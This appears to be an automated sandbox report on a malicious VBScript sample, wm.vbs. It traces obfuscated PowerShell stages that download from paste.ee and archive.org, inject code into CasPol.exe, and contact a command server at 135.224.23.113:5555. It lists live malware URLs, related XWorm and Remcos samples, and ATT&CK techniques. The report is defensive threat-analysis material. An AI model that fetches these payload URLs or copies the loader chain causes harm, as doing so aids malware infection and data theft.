                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: CasPol.exe, 0000000A.00000002.2644477177.0000000001181000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.2644477177.00000000011C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara match | File source: 9.2.powershell.exe.1697be10000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.powershell.exe.1697be10000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.powershell.exe.16910e2f3a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.powershell.exe.16910e2f3a0.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000009.00000002.1736234279.000001697BE10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1704495175.000001691061B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.powershell.exe.1690061e580.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.powershell.exe.1690061e580.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2650769165.0000000003531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 2960, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara match | File source: 9.2.powershell.exe.1697be10000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.powershell.exe.1697be10000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.powershell.exe.16910e2f3a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.powershell.exe.16910e2f3a0.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000009.00000002.1736234279.000001697BE10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1704495175.000001691061B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.powershell.exe.1690061e580.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.powershell.exe.1690061e580.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.2644095929.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.2650769165.0000000003531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1675423746.000001690060E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7348, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 2960, type: MEMORYSTR
                ATT&CK matrix, listed by tactic (numbers preceding a technique are the report's match-count markers):
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: 11 Windows Management Instrumentation; 1 Exploitation for Client Execution; 11 Command and Scripting Interpreter; 3 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 221 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: 1 DLL Side-Loading; 211 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 141 Virtualization/Sandbox Evasion; 211 Process Injection
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: 1 File and Directory Discovery; 13 System Information Discovery; 121 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                Behavior Graph (ID: 1518301, Sample: wm.vbs, Startdate: 25/09/2024, Architecture: WINDOWS, Score: 100). The graph image is not reproduced; the node and edge data recovered from it:
                Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures. Contacted hosts: paste.ee (Connects to a pastebin service (likely for C&C)), ia600100.us.archive.org.
                wscript.exe: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures. Starts cmd.exe and powershell.exe.
                cmd.exe: Wscript starts Powershell (via cmd or directly); Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks. Starts powershell.exe, PING.EXE and conhost.exe. PING.EXE contacts 127.0.0.1.
                powershell.exe (from cmd.exe): Suspicious powershell command line found; Obfuscated command line found; Found suspicious powershell code related to unpacking or dynamic code loading.
                powershell.exe (from wscript.exe): Suspicious powershell command line found; Obfuscated command line found. Starts powershell.exe and conhost.exe.
                powershell.exe (second stage): connects to paste.ee 188.114.96.3 port 443 (local port 49708, CLOUDFLARENETUS, European Union) and ia600100.us.archive.org 207.241.227.240 port 443 (local port 49707, INTERNET-ARCHIVEUS, United States); Writes to foreign memory regions; Injects a PE file into a foreign process. Starts CasPol.exe.
                CasPol.exe: connects to 135.224.23.113 port 5555 (local port 49709, LUCENT-CIOUS, United States); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines).

                Source | Detection | Scanner | Label | Link
                wm.vbs | 0% | ReversingLabs | |
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
                http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
                https://go.micro | 0% | URL Reputation | safe |
                https://contoso.com/License | 0% | URL Reputation | safe |
                https://contoso.com/Icon | 0% | URL Reputation | safe |
                https://contoso.com/ | 0% | URL Reputation | safe |
                https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
                https://oneget.orgX | 0% | URL Reputation | safe |
                https://aka.ms/pscore68 | 0% | URL Reputation | safe |
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                https://oneget.org | 0% | URL Reputation | safe |
                http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe |
                https://paste.ee | 0% | Avira URL Cloud | safe |
                https://www.google.com; | 0% | Avira URL Cloud | safe |
                http://www.apache.org/licenses/LICENSE-2.0 | 0% | Avira URL Cloud | safe |
                https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
                http://paste.ee | 0% | Avira URL Cloud | safe |
                https://paste.ee/d/Sk1Jg/0 | 100% | Avira URL Cloud | malware |
                https://aka.ms/pscore6 | 0% | Avira URL Cloud | safe |
                https://analytics.paste.ee | 0% | Avira URL Cloud | safe |
                https://ia600100.us.arX | 0% | Avira URL Cloud | safe |
                https://analytics.paste.ee; | 0% | Avira URL Cloud | safe |
                https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | 100% | Avira URL Cloud | malware |
                135.224.23.113 | 0% | Avira URL Cloud | safe |
                http://crl.microsofth | 0% | Avira URL Cloud | safe |
                https://ia600100.us.archive.org | 0% | Avira URL Cloud | safe |
                https://cdnjs.cloudflare.com; | 0% | Avira URL Cloud | safe |
                https://www.google.com | 0% | Avira URL Cloud | safe |
                https://secure.gravatar.com | 0% | Avira URL Cloud | safe |
                https://themes.googleusercontent.com | 0% | Avira URL Cloud | safe |
                https://cdnjs.cloudflare.com | 0% | Avira URL Cloud | safe |
                http://ia600100.us.archive.org | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ia600100.us.archive.org | 207.241.227.240 | true | false | | unknown
paste.ee | 188.114.96.3 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://paste.ee/d/Sk1Jg/0 | true | Avira URL Cloud: malware | unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | false | Avira URL Cloud: malware | unknown
135.224.23.113 | true | Avira URL Cloud: safe | unknown
Name | Malicious | Antivirus Detection | Reputation | Source
http://nuget.org/NuGet.exe | false | URL Reputation: safe | unknown | powershell.exe, 00000009.00000002.1675423746.0000016901929000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmp
http://www.apache.org/licenses/LICENSE-2.0 | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.00000169016C0000.00000004.00000800.00020000.00000000.sdmp
http://pesterbdd.com/images/Pester.png | false | URL Reputation: safe | unknown | powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmp
http://paste.ee | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.0000016900408000.00000004.00000800.00020000.00000000.sdmp
http://www.apache.org/licenses/LICENSE-2.0.html | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmp
https://go.micro | false | URL Reputation: safe | unknown | powershell.exe, 00000009.00000002.1675423746.000001690100E000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/License | false | URL Reputation: safe | unknown | powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmp
https://www.google.com; | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp
https://contoso.com/Icon | false | URL Reputation: safe | unknown | powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmp
https://ia600100.us.arX | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.00000169015F0000.00000004.00000800.00020000.00000000.sdmp
https://analytics.paste.ee | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp
https://paste.ee | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.0000016900408000.00000004.00000800.00020000.00000000.sdmp
https://aka.ms/pscore6 | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000005.00000002.1513504661.000001618001B000.00000004.00000800.00020000.00000000.sdmp
https://github.com/Pester/Pester | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmp
https://www.google.com | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp
http://crl.microsofth | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1729309445.00000169798D5000.00000004.00000020.00020000.00000000.sdmp
https://contoso.com/ | false | URL Reputation: safe | unknown | powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmp
https://nuget.org/nuget.exe | false | URL Reputation: safe | unknown | powershell.exe, 00000009.00000002.1675423746.0000016901929000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1704495175.000001691007E000.00000004.00000800.00020000.00000000.sdmp
https://oneget.orgX | false | URL Reputation: safe | unknown | powershell.exe, 00000009.00000002.1675423746.00000169016C0000.00000004.00000800.00020000.00000000.sdmp
https://analytics.paste.ee; | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp
https://ia600100.us.archive.org | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.00000169015F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.0000016900224000.00000004.00000800.00020000.00000000.sdmp
https://cdnjs.cloudflare.com | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp
https://aka.ms/pscore68 | false | URL Reputation: safe | unknown | powershell.exe, 00000005.00000002.1513504661.0000016180069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1746456997.0000023B00062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1746456997.0000023B0004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.0000016900001000.00000004.00000800.00020000.00000000.sdmp
https://cdnjs.cloudflare.com; | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | false | URL Reputation: safe | unknown | powershell.exe, 00000005.00000002.1513504661.000001618009B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1746456997.0000023B0004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.0000016900001000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.2650769165.0000000003531000.00000004.00000800.00020000.00000000.sdmp
https://secure.gravatar.com | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp
https://themes.googleusercontent.com | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.00000169005E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1675423746.00000169003C4000.00000004.00000800.00020000.00000000.sdmp
https://oneget.org | false | URL Reputation: safe | unknown | powershell.exe, 00000009.00000002.1675423746.00000169016C0000.00000004.00000800.00020000.00000000.sdmp
http://ia600100.us.archive.org | false | Avira URL Cloud: safe | unknown | powershell.exe, 00000009.00000002.1675423746.0000016901679000.00000004.00000800.00020000.00000000.sdmp
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.96.3 | paste.ee | European Union | 13335 | CLOUDFLARENETUS | true
207.241.227.240 | ia600100.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
135.224.23.113 | unknown | United States | 10455 | LUCENT-CIOUS | true
                    IP
                    127.0.0.1
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1518301
                    Start date and time:2024-09-25 15:25:09 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 2s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:14
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:wm.vbs
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winVBS@15/8@2/4
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:
                    • Successful, ratio: 93%
                    • Number of executed functions: 11
                    • Number of non-executed functions: 3
                    Cookbook Comments:
                    • Found application associated with file extension: .vbs
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 7348 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 7968 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 8152 because it is empty
• Not all processes were analyzed; report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: wm.vbs
Time | Type | Description
09:26:19 | API Interceptor | 54x Sleep call for process: powershell.exe modified
09:26:42 | API Interceptor | 1204278x Sleep call for process: CasPol.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.96.3 | https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH | malicious | Unknown | hdcy.emcl00.com/qRCfs/
 | PO23100072.exe | malicious | FormBook | www.cc101.pro/ttiz/
 | RFQ urrgently.exe | malicious | FormBook | www.1win-moldovia.fun/1g7m/
 | TNT AWB TRACKING DETAILS.exe | malicious | FormBook | www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
 | Petronas quotation request.exe | malicious | FormBook | www.chinaen.org/zi4g/
 | Shipping Documemt.vbs | malicious | Lokibot | werdotx.shop/Devil/PWS/fre.php
 | Quotes updates request.exe | malicious | FormBook | www.1win-moldovia.fun/1g7m/
 | PO-001.exe | malicious | FormBook | www.1win-moldovia.fun/kslt/
 | PO2024033194.exe | malicious | FormBook | www.rtpngk.xyz/876i/
 | LOL and profile.exe | malicious | FormBook | www.chinaen.org/zi4g/
207.241.227.240 | TM3utH2CsU.exe | malicious | PureLog Stealer, XWorm |
 | BL.xls | malicious | Remcos, PureLog Stealer |
 | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer |
 | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer |
 | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer |
 | Order draft.vbs | malicious | Azorult, PureLog Stealer |
 | SPEC.xls | malicious | Remcos, PureLog Stealer |
 | US0914424A.xla.xlsx | malicious | Remcos, PureLog Stealer |
 | IEnetbookCookies.hta | malicious | Cobalt Strike, Remcos, PureLog Stealer |
 | US091024A.xla.xlsx | malicious | Remcos, PureLog Stealer |
135.224.23.113 | 1727269807db8b68b2c9b1c9bdd42030655a5e439e971ba77503b2390bf7da0c0928072d74511.dat-decoded.exe | malicious | XWorm |
 | TM3utH2CsU.exe | malicious | PureLog Stealer, XWorm |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
paste.ee | Zoom_Invite.call-660194855683.wsf | malicious | XWorm | 188.114.97.3
 | reported_account_violation-pdf-67223451.wsf | malicious | XWorm | 188.114.97.3
 | New_Document-660128863990.wsf | malicious | Unknown | 188.114.96.3
 | New_Document-660119928827.wsf | malicious | Unknown | 188.114.97.3
 | New_Document-0706282.js | malicious | Unknown | 188.114.96.3
 | New_Document-0706282.js | malicious | Unknown | 188.114.97.3
 | asd.wsf | malicious | XWorm | 188.114.97.3
 | Commitment_for_Title_Insurance-660184790411.wsf | malicious | XWorm | 188.114.97.3
 | Document-660117765723.wsf | malicious | XWorm | 188.114.97.3
 | evidenne_for_suspect_2481u41u824u8124-pdf-660103895361.wsf | malicious | Unknown | 188.114.96.3
ia600100.us.archive.org | BL.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
 | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
 | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
 | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | 207.241.227.240
 | Order draft.vbs | malicious | Azorult, PureLog Stealer | 207.241.227.240
 | SPEC.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
 | US0914424A.xla.xlsx | malicious | Remcos, PureLog Stealer | 207.241.227.240
 | IEnetbookCookies.hta | malicious | Cobalt Strike, Remcos, PureLog Stealer | 207.241.227.240
 | US091024A.xla.xlsx | malicious | Remcos, PureLog Stealer | 207.241.227.240
 | Label_091273172.vbs | malicious | Remcos, PureLog Stealer | 207.241.227.240
Match | Associated Sample Name / URL | Detection | Threat Name | Context
LUCENT-CIOUS | 1727269807db8b68b2c9b1c9bdd42030655a5e439e971ba77503b2390bf7da0c0928072d74511.dat-decoded.exe | malicious | XWorm | 135.224.23.113
 | TM3utH2CsU.exe | malicious | PureLog Stealer, XWorm | 135.224.23.113
 | SecuriteInfo.com.Linux.Siggen.9999.13221.8731.elf | malicious | Unknown | 135.225.246.112
 | mdfh8nJQAy.elf | malicious | Mirai, Moobot | 135.87.80.52
 | SecuriteInfo.com.Linux.Siggen.9999.8163.26295.elf | malicious | Mirai | 135.237.36.212
 | tmNB51skaY.elf | malicious | Mirai | 135.242.130.152
 | QvTbUiFWlo.elf | malicious | Mirai | 152.148.171.251
 | SecuriteInfo.com.Linux.Siggen.9999.11579.20419.elf | malicious | Mirai | 135.90.159.82
 | SecuriteInfo.com.Linux.Siggen.9999.21530.5221.elf | malicious | Mirai | 135.239.42.142
 | sh4.elf | malicious | Mirai, Moobot | 135.89.245.17
INTERNET-ARCHIVEUS | TM3utH2CsU.exe | malicious | PureLog Stealer, XWorm | 207.241.227.240
 | BL.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
 | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
 | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
 | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | 207.241.227.240
 | Order draft.vbs | malicious | Azorult, PureLog Stealer | 207.241.227.240
 | SPEC.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
 | US0914424A.xla.xlsx | malicious | Remcos, PureLog Stealer | 207.241.227.240
 | IEnetbookCookies.hta | malicious | Cobalt Strike, Remcos, PureLog Stealer | 207.241.227.240
 | US091024A.xla.xlsx | malicious | Remcos, PureLog Stealer | 207.241.227.240
CLOUDFLARENETUS | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 188.114.96.3
 | http://mir-belting.com | malicious | Unknown | 162.159.140.229
 | https://empshentel.com/share/sharefile/ | malicious | HTMLPhisher | 172.67.177.128
 | https://nvoice0077.s3.ap-southeast-2.amazonaws.com/Viewer.html | malicious | ScreenConnect Tool | 188.114.97.3
 | PO5118000306 pdf.exe | malicious | FormBook | 188.114.97.3
 | ptgl503.exe | malicious | LummaC | 172.67.206.221
 | https://odo1s.risongeye.com/oTUk/ | malicious | HTMLPhisher | 188.114.96.3
 | Suselx1.exe | malicious | LummaC | 172.67.189.2
 | https://www.concursolutions.us.com/lstQ3Ewa4RAt2API1AnsoTxu4RAcQ3EpQ3E4RAfoTx4RAmsz01coTxm | malicious | Unknown | 1.1.1.1
 | gkqg90.ps1 | malicious | LummaC | 172.67.189.2
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Teklifformu_Ekinoks LS 1087251 04-00000152.exe | malicious | Snake Keylogger | 207.241.227.240, 188.114.96.3
 | http://mir-belting.com | malicious | Unknown | 207.241.227.240, 188.114.96.3
 | PO5118000306 pdf.exe | malicious | FormBook | 207.241.227.240, 188.114.96.3
 | test.bat | malicious | MicroClip | 207.241.227.240, 188.114.96.3
 | z38PO_20248099-1_pdf.exe | malicious | AgentTesla | 207.241.227.240, 188.114.96.3
 | rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 207.241.227.240, 188.114.96.3
 | rTEKL__FTALEPVEF__YATTEKL__F__.exe | malicious | Snake Keylogger, VIP Keylogger | 207.241.227.240, 188.114.96.3
 | 9YOOBuBZtj.exe | malicious | ScreenConnect Tool | 207.241.227.240, 188.114.96.3
 | 6Zx9GI028y.exe | malicious | ScreenConnect Tool | 207.241.227.240, 188.114.96.3
 | 4ZVhm9dOfO.exe | malicious | ScreenConnect Tool | 207.241.227.240, 188.114.96.3
                                            No context
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):9434
                                            Entropy (8bit):4.928515784730612
                                            Encrypted:false
                                            SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                            MD5:D3594118838EF8580975DDA877E44DEB
                                            SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                            SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                            SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):0.34726597513537405
                                            Encrypted:false
                                            SSDEEP:3:Nlll:Nll
